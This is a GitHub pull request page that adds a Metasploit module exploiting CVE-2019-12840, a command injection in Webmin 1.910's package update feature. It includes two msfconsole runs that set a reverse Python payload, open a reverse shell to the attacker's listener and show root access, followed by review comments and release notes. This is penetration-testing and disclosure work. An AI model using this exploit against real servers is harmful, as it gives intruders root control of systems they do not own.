Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2019-12840 - Add Webmin 1.910 RCE Module #11983

Merged
merged 7 commits into from Jun 19, 2019

Conversation

Projects
None yet
5 participants
@siberguvenlik
Copy link
Contributor

commented Jun 16, 2019

Adding Webmin RCE module affecting Webmin <= 1.910.
Module exploits an arbitrary command execution vulnerability.
Any user authorized to the "Package Updates" module can execute arbitrary commands with root privileges via the data parameter to update.cgi.

Verification

msf5 >
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 192.168.1.9
RHOSTS => 192.168.1.9
msf5 exploit(linux/http/webmin_packageup_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 192.168.1.9
LHOST => 192.168.1.12
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME rce
USERNAME => rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD password
PASSWORD => password
msf5 exploit(linux/http/webmin_packageup_rce) > check

[] NICE! rce has the right to >>Package Update<<

[+] 192.168.1.9:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[] Started reverse TCP handler on 192.168.1.12:4444
[+] Session cookie: b188bde1b3979ada77f1f8e4f84f7d4c
[] Attempting to execute the payload...
[] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.9:57270) at 2019-06-16 11:07:04 -0400

id
uid=0(root) gid=0(root) groups=0(root)

Details and References

https://nvd.nist.gov/vuln/detail/CVE-2019-12840
https://www.exploit-db.com/exploits/46984
https://www.pentest.com.tr/exploits/Webmin-1910-Package-Updates-Remote-Command-Execution.html

@siberguvenlik

This comment has been minimized.

siberguvenlik added some commits Jun 17, 2019

Converting version check request to vars_get
We also need to add the "testing = 1" cookie to the login request. Otherwise, the browser displays a No-Cookie error.

@space-r7 space-r7 added docs and removed needs-docs labels Jun 17, 2019

@space-r7 space-r7 self-assigned this Jun 17, 2019

@wvu-r7
Copy link
Contributor

left a comment

Comments for @space-r7 to possibly address.

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 17, 2019

Hi @siberguvenlik, I just submitted a PR to your branch that addresses the changes suggested here in this PR. Please let me know if you have any issues with that. Thank you!

Merge pull request #1 from space-r7/pr11983
Add minor module changes
@siberguvenlik

This comment has been minimized.

Copy link
Contributor Author

commented Jun 18, 2019

thanks @space-r7 and @wvu-r7. I performed the required action.

@wvu-r7

wvu-r7 approved these changes Jun 18, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 19, 2019

Tested:

msf5 > use exploit/linux/http/webmin_packageup_rce 
msf5 exploit(linux/http/webmin_packageup_rce) > set rhosts 192.168.37.132
rhosts => 192.168.37.132
msf5 exploit(linux/http/webmin_packageup_rce) > set username space
username => space
msf5 exploit(linux/http/webmin_packageup_rce) > set password password
password => password
msf5 exploit(linux/http/webmin_packageup_rce) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/webmin_packageup_rce) > set ssl true
ssl => true
msf5 exploit(linux/http/webmin_packageup_rce) > check

[*] NICE! space has the right to >>Package Update<<
[+] 192.168.37.132:10000 - The target is vulnerable.
msf5 exploit(linux/http/webmin_packageup_rce) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[+] Session cookie: f20e69324fc0187678798822c4c21365
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.132:57616) at 2019-06-19 08:29:59 -0500

whoami

root

@space-r7 space-r7 merged commit 992a638 into rapid7:master Jun 19, 2019

3 checks passed

Metasploit Automation - Sanity Test Execution Successfully completed all tests.
Details
Metasploit Automation - Test Execution Successfully completed all tests.
Details
continuous-integration/travis-ci/pr The Travis CI build passed
Details

space-r7 added a commit that referenced this pull request Jun 19, 2019

msjenkins-r7 added a commit that referenced this pull request Jun 19, 2019

@space-r7

This comment has been minimized.

Copy link
Contributor

commented Jun 19, 2019

Release Notes

The Webmin RCE module targets CVE-2019-12840. It gets code execution with root privileges in Webmin versions <= 1.910 via the unsanitized data parameter to update.cgi.

@tdoan-r7 tdoan-r7 added the rn-modules label Jun 26, 2019

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.